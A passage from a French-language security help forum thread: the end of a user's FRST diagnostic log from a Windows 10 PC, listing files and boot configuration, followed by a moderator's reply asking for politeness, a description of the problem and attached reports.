2020-11-18 04:45 - 2020-05-30 13:27 - 002876928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2020-11-17 19:28 - 2020-06-11 04:43 - 000000000 ____D C:\Users\HP\AppData\Local\.IdentityService
2020-11-17 18:38 - 2020-06-08 12:07 - 000000000 ____D C:\Users\HP\AppData\Local\PlaceholderTileLogoFolder
2020-11-17 18:38 - 2020-05-31 15:41 - 000000000 ____D C:\ProgramData\Packages
2020-11-10 15:39 - 2019-03-19 05:59 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\telnet.exe
2020-11-10 14:28 - 2020-07-29 02:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-11-10 13:34 - 2020-06-28 04:00 - 000000000 ____D C:\Users\HP\Desktop\MAISON DE LA DESTINEE

==================== Fichiers à la racine de certains dossiers ========

2020-06-12 14:26 - 2020-06-12 14:26 - 000000000 _____ () C:\Users\HP\.mongorc.js
2020-12-09 13:07 - 2020-12-09 13:07 - 000032768 _____ () C:\Users\HP\AppData\Roaming\1607515644977-shm
2020-12-09 13:07 - 2020-12-09 13:07 - 000000000 _____ () C:\Users\HP\AppData\Roaming\1607515644977-wal
2020-12-09 13:09 - 2020-12-09 13:09 - 000032768 _____ () C:\Users\HP\AppData\Roaming\1607515759026-shm
2020-12-09 13:09 - 2020-12-09 13:09 - 000000000 _____ () C:\Users\HP\AppData\Roaming\1607515759026-wal
2020-12-08 07:58 - 2020-12-08 07:58 - 001551804 _____ () C:\Users\HP\AppData\Roaming\179442746
2020-07-31 11:17 - 2020-12-04 00:46 - 000011890 _____ () C:\Users\HP\AppData\Local\oobelibMkey.log

==================== SigCheckExt =========================

2020-06-09 11:58 - 2019-11-08 10:15 - 003600896 _____ C:\Windows\system32\pwNative.exe
2020-06-11 23:32 - 2010-12-06 03:16 - 000090112 _____ (Vestris Inc.) C:\Windows\system32\Vestris.ResourceLib.dll
2020-12-09 14:22 - 2020-12-09 14:22 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2020-12-09 14:22 - 2020-12-09 14:22 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2000-10-17 06:59 - 2000-10-17 06:59 - 000053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42loc.dll
2000-10-17 06:59 - 2000-10-17 06:59 - 001056768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJET35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJINT35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSJTER35.DLL
2000-10-17 06:59 - 2000-10-17 06:59 - 000415504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSREPL35.DLL
2020-12-09 13:01 - 2014-04-03 20:22 - 000645592 _____ C:\Windows\SysWOW64\sqlite3.dll
2000-10-17 06:59 - 2000-10-17 06:59 - 000368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VBAR332.DLL
2020-12-09 15:12 - 2020-12-09 15:13 - 002288640 _____ (Farbar) C:\Users\HP\Downloads\FRST64.exe

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)


==================== BCD ================================

Gestionnaire de démarrage Windows
---------------------------------
identificateur          {bootmgr}
device                  partition=\Device\HarddiskVolume1
description             Windows Boot Manager
locale                  fr-FR
inherit                 {globalsettings}
default                 {current}
resumeobject            {c5195d39-a278-11ea-9518-94242a07f8cb}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30

Chargeur de démarrage Windows
-----------------------------
identificateur          {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 10
locale                  fr-FR
inherit                 {bootloadersettings}
recoverysequence        {c5195d3b-a278-11ea-9518-94242a07f8cb}
displaymessageoverride  Recovery
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
osdevice                partition=C:
systemroot              \Windows
resumeobject            {c5195d39-a278-11ea-9518-94242a07f8cb}
nx                      OptIn
bootmenupolicy          Standard

Chargeur de démarrage Windows
-----------------------------
identificateur          {c5195d3b-a278-11ea-9518-94242a07f8cb}
device                  ramdisk=[\Device\HarddiskVolume1]\Recovery\WindowsRE\Winre.wim,{c5195d3c-a278-11ea-9518-94242a07f8cb}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  fr-fr
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume1]\Recovery\WindowsRE\Winre.wim,{c5195d3c-a278-11ea-9518-94242a07f8cb}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Reprendre à partir de la mise en veille prolongée
-------------------------------------------------
identificateur          {c5195d39-a278-11ea-9518-94242a07f8cb}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  fr-FR
inherit                 {resumeloadersettings}
recoverysequence        {c5195d3b-a278-11ea-9518-94242a07f8cb}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Testeur de mémoire Windows
--------------------------
identificateur          {memdiag}
device                  partition=\Device\HarddiskVolume1
path                    \boot\memtest.exe
description             Diagnostics mémoire Windows
locale                  fr-FR
inherit                 {globalsettings}
badmemoryaccess         Yes

Paramètres EMS
--------------
identificateur          {emssettings}
bootems                 No

Paramètres du débogueur
-----------------------
identificateur          {dbgsettings}
debugtype               Local

Erreurs de mémoire RAM
----------------------
identificateur          {badmemory}

Paramètres globaux
------------------
identificateur          {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Paramètres du chargeur de démarrage
-----------------------------------
identificateur          {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Paramètres de l'hyperviseur
-------------------
identificateur          {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Paramètres du chargeur de reprise
---------------------------------
identificateur          {resumeloadersettings}
inherit                 {globalsettings}

Options de périphérique
-----------------------
identificateur          {c5195d3c-a278-11ea-9518-94242a07f8cb}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume1
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

==================== Fin de FRST.txt ========================
Malekal_morte
Messages: 108314
Joined: 10 Sep 2005 13:57

Re: INTERPRET FRST REPORT

by Malekal_morte »

Hi,

1) Please be polite
2) Please explain the problems you are encountering
3) Please attach the reports to your message as attachments, or use https://pjjoint.malekal.com/, to make them easier to read
First basic rule of security: think, then click, not the other way round - Files and programs are like candy: when they come from a stranger, you don't accept them!